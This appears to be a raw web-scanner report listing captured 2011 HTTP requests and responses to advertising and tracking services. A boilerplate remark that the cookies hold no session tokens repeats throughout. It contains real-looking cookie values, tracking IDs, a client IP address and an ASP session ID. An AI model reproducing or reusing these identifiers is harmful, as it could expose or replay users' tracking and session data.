Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMTY1ODA3MTY4LjMwMTQ3MTkyAAAAAAABAAAAbgIBAAsTtE0LE7RNAQAAABQuAAALE7RNCxO0TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: kroogy.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 24 Apr 2011 03:08:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://ad.yieldmanager.com/pixel?id=562283&t=2 Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/ Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sun, 24 Apr 2011 04:08:32 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04 HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /z/371/CD1/id4+106163471 HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /z/48/CD1/945440258 HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01 HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /z/518/CD1/idf+903230053 HTTP/1.1 Host: partners.nextadnetwork.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367 Cache-Control: no-cache Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Sun, 24 Apr 2011 03:08:32 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Connection: Keep-Alive Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A?cust=SUZE%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-09-59CD1 HTTP/1.1 Host: roia.biz Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf%20903230053CD1 HTTP/1.1 Host: roia.biz Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ManageBooking.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:11:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277 Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=609040248906-708747063996&protV=20&lpjson=1&id=2386500579&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ManageBooking.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=5427601522506632860; LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; HumanClickSiteContainerID_71003277=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:13:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickACTIVE=1303647201834; expires=Mon, 25-Apr-2011 12:13:21 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 24 Apr 2011 12:13:21 GMT Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 27397
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/71003277/?&site=71003277&cmd=mTagKnockPage&lpCallId=745409803464-13586354209&protV=20&lpjson=1&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotelclub-chat-en%7Cnull%7Chotelclub-chat-buttondiv%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ManageBooking.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=16601209214853,d=1303177644
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:11:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickKEY=2881751932682469133; path=/hc/71003277 Set-Cookie: HumanClickACTIVE=1303647090025; expires=Mon, 25-Apr-2011 12:11:30 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 24 Apr 2011 12:11:30 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 27396
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1 Host: stats.kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1 Host: stats.kroogy.com Proxy-Connection: keep-alive Referer: http://kroogy.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943; cnscc=1303647928
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1 Host: www.apmebf.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: S=g14vo-36788-1303134591742-0g
Response
HTTP/1.1 302 Found Server: Resin/3.1.8 P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT" Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Sun, 24 Apr 2011 03:10:07 GMT Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<< Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT Content-Type: text/html Connection: close Date: Sun, 24 Apr 2011 03:10:07 GMT Content-Length: 983
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1 Host: www.emjcd.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http://clk.atdmt.com/go/253732016/direct%3Bai.194941096%3Bct.1/01 HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1